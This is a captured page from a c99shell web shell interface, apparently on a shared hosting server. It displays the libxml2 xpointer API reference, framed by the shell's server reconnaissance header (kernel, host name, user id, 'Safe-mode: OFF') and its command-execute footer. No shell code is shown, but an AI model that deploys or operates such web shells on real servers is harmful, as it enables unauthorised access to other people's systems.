Software: Apache. PHP/7.3.33 uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) Safe-mode: OFF (not secure) /usr/share/gtk-doc/html/libxml2/ drwxr-xr-x |
Viewing file: Select action/file-type:
xpointerxpointer - API to handle XML Pointers API to handle XML Pointers Base implementation was made accordingly to W3C Candidate Recommendation 7 June 2000 Author(s): Daniel Veillard Synopsistypedef struct _xmlLocationSet xmlLocationSet; typedef xmlLocationSet * xmlLocationSetPtr; xmlXPathObjectPtr xmlXPtrNewRange (xmlNodePtr start, DescriptionDetailsStructure xmlLocationSetstruct _xmlLocationSet { int locNr : number of locations in the set int locMax : size of the array as allocated xmlXPathObjectPtr * locTab : array of locations } xmlLocationSet; Typedef xmlLocationSetPtrxmlLocationSet * xmlLocationSetPtr; xmlXPtrBuildNodeList ()xmlNodePtr xmlXPtrBuildNodeList (xmlXPathObjectPtr obj) Build a node list tree copy of the XPointer result. This will drop Attributes and Namespace declarations.
xmlXPtrEval ()xmlXPathObjectPtr xmlXPtrEval (const xmlChar * str, Evaluate the XPath Location Path in the given context.
xmlXPtrEvalRangePredicate ()void xmlXPtrEvalRangePredicate (xmlXPathParserContextPtr ctxt) [8] Predicate ::= '[' PredicateExpr ']' [9] PredicateExpr ::= Expr Evaluate a predicate as in xmlXPathEvalPredicate() but for a Location Set instead of a node set
xmlXPtrFreeLocationSet ()void xmlXPtrFreeLocationSet (xmlLocationSetPtr obj) Free the LocationSet compound (not the actual ranges !).
xmlXPtrLocationSetAdd ()void xmlXPtrLocationSetAdd (xmlLocationSetPtr cur, add a new xmlXPathObjectPtr to an existing LocationSet If the location already exist in the set @val is freed.
xmlXPtrLocationSetCreate ()xmlLocationSetPtr xmlXPtrLocationSetCreate (xmlXPathObjectPtr val) Create a new xmlLocationSetPtr of type double and of value @val
xmlXPtrLocationSetDel ()void xmlXPtrLocationSetDel (xmlLocationSetPtr cur, Removes an xmlXPathObjectPtr from an existing LocationSet
xmlXPtrLocationSetMerge ()xmlLocationSetPtr xmlXPtrLocationSetMerge (xmlLocationSetPtr val1, Merges two rangesets, all ranges from @val2 are added to @val1
xmlXPtrLocationSetRemove ()void xmlXPtrLocationSetRemove (xmlLocationSetPtr cur, Removes an entry from an existing LocationSet list.
xmlXPtrNewCollapsedRange ()xmlXPathObjectPtr xmlXPtrNewCollapsedRange (xmlNodePtr start) Create a new xmlXPathObjectPtr of type range using a single nodes
xmlXPtrNewContext ()xmlXPathContextPtr xmlXPtrNewContext (xmlDocPtr doc, Create a new XPointer context
xmlXPtrNewLocationSetNodeSet ()xmlXPathObjectPtr xmlXPtrNewLocationSetNodeSet (xmlNodeSetPtr set) Create a new xmlXPathObjectPtr of type LocationSet and initialize it with all the nodes from @set
xmlXPtrNewLocationSetNodes ()xmlXPathObjectPtr xmlXPtrNewLocationSetNodes (xmlNodePtr start, Create a new xmlXPathObjectPtr of type LocationSet and initialize it with the single range made of the two nodes @start and @end
xmlXPtrNewRange ()xmlXPathObjectPtr xmlXPtrNewRange (xmlNodePtr start, Create a new xmlXPathObjectPtr of type range
xmlXPtrNewRangeNodeObject ()xmlXPathObjectPtr xmlXPtrNewRangeNodeObject (xmlNodePtr start, Create a new xmlXPathObjectPtr of type range from a not to an object
xmlXPtrNewRangeNodePoint ()xmlXPathObjectPtr xmlXPtrNewRangeNodePoint (xmlNodePtr start, Create a new xmlXPathObjectPtr of type range from a node to a point
xmlXPtrNewRangeNodes ()xmlXPathObjectPtr xmlXPtrNewRangeNodes (xmlNodePtr start, Create a new xmlXPathObjectPtr of type range using 2 nodes
xmlXPtrNewRangePointNode ()xmlXPathObjectPtr xmlXPtrNewRangePointNode (xmlXPathObjectPtr start, Create a new xmlXPathObjectPtr of type range from a point to a node
xmlXPtrNewRangePoints ()xmlXPathObjectPtr xmlXPtrNewRangePoints (xmlXPathObjectPtr start, Create a new xmlXPathObjectPtr of type range using 2 Points
xmlXPtrRangeToFunction ()void xmlXPtrRangeToFunction (xmlXPathParserContextPtr ctxt, Implement the range-to() XPointer function Obsolete. range-to is not a real function but a special type of location step which is handled in xpath.c.
xmlXPtrWrapLocationSet ()xmlXPathObjectPtr xmlXPtrWrapLocationSet (xmlLocationSetPtr val) Wrap the LocationSet @val in a new xmlXPathObjectPtr
|
:: Command execute :: | |
--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0127 ]-- |